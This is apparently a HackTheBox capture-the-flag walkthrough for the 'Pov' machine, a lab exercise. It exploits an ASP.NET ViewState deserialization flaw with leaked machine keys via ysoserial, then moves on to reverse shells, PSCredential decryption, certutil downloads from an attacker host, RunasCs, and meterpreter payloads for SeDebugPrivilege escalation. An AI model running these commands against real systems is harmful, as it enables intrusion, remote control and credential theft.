Welcome to this HackTheBox CTF Walkthrough! In today’s walkthrough, we will be solving the Pov machine, step by step. The difficulty of this CTF is medium. Let’s get started and hack our way to root this box!
Before You Start!!
- Connect to HackTheBox using openvpn.
- Add “IP pov.htb” to /etc/hosts file.
Scanning
Let’s start scanning our target ip using nmap fast scan
nmap -F 10.10.11.251Result
We got only 1 open port i.e. 80
Accessing & Enumerating Port 80
After accessing port 80 we got a web page
Here before doing anything i started subdomain enumeration and directory enumeration using gobuster tool.
For SubDomain Enumeration
command
gobuster vhost -u http://pov.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 40 | tee gobuster-subdomainEnum.txtResult
We found one subdomain i.e. dev.pov.htb, Add this subdomain inside /etc/hosts file with pov.htb
For Directory Enumeration
command:
dirb http://pov.htbFound Nothing Interesting Here
Finding Web Technologies Using Wappalyzer
I tried more enumeration methods too like checking robots.txt file and page source code etc but found nothing interesting on this domain.
Let’s move to dev.pov.htb subdomain that we found before.
After accessing http://dev.pov.htb this redirecting us to /portfolio/default.aspx
I started Enumerating this subdomain too
Web Technologies Using Wappalyzer
Directory & File Enumeration
After enumeration i found out there is a download button for downloading CV.
Inside burp this downloading request look like this.
After this i started looking for iis exploitation on google and got a hacktricks page
I tried accessing /web.config file by replacing cv.pdf on the request and find something interesting
In response we find some configuration details including decryption key and validation key.
Gaining Shell
After some research on google i found a page that we can use to exploit via using these configuration details i.e https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
I booted up my windows machine and downloaded ysoserial.exe binary from url: Ysoserial.net Github Repo
And using reverse shell with validation key and decryption key i created a payload.
For Creating Reverse Shell For PowerShell
I am using Online — Reverse Shell Generator for generating reverse shell
After this i started netcat listner on port 1234 and copy this reverse shell and go to windows box and using ysoserial.exe i generate payload
Command For Generating Payload
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "Reverse_Shell_Here" --path="/portfolio/default.aspx" --approach="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"After you get payload copy payload and this time while intercepting request in burp click on Download CV Button again, Replace value of “__VIEWSTATE” parameter with generated payload and send the request.
If everything has been set up properly, you should see a successful connection.
Finding User.txt
After gaining shell i directly go inside C:\Users\sfitz\Desktop But i didn’t find anything here. Then i start enumerating more and find a file inside \Documents named as connection.xml
Here we got a encrypted string in Password. I started searching for System.Management.Automation.PSCredential on Google and find a web page: https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8
Command I Use:
$user = "alaading"$pass = "Password_String_Here"$cred = New-Object System.Management.Automation.PSCredential($user, $pass)$cred.GetNetworkCredential() | flAnd we got password!!
I tried gaining this user access using evil-winrm but it didn’t work So i decide using RunasCs.exe which used for privilege escalation in Windows environments. It allows users to execute commands or run applications with the credentials of another user, typically with higher privileges, such as a system or administrator account. You can download RunasCs.exe Binary using url: https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
After Downloading and unzipping you’ll get RunasCs.exe, Using python3 and certutil i uploaded this binary to target machine
For Running Python Server
python3 -m http.server
For Downloading
certutil.exe -urlcache -f http://10.10.16.23:8000/RunasCs.exe RunasCs.exeBefore running i started netcat listner on different port and using below command i gain alaading user shell
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.16.23:2345Now you know where you can find user.txt :)
Finding Root.txt
I type command “whoami /priv” for finding user privileges assigned to the currently logged-in user.
We can see SeDebugPrivilege but Disabled.
If you don’t know about SeDebugPrivilege you can simply search on google about it’s privilege escalation tactics.
For enabling we are going to download following scripts on our local system:
Then upload them on alaading user system using certutils
Run these script and check privilege again
Now let’s find pid of a process that is privileged.
So, if we migrate to winlogon process we will run as system.
Create meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3456 -f exe -o payload.exeUpload this payload.exe to alaading user and before running this payload start msfconsole and set listner
Now run the payload.exe and it’ll give use meterpreter shell.
After gaining meterpreter session migrate winlogon id
BOOMM!! WE SOLVED POV BOX SUCCESSFULLY
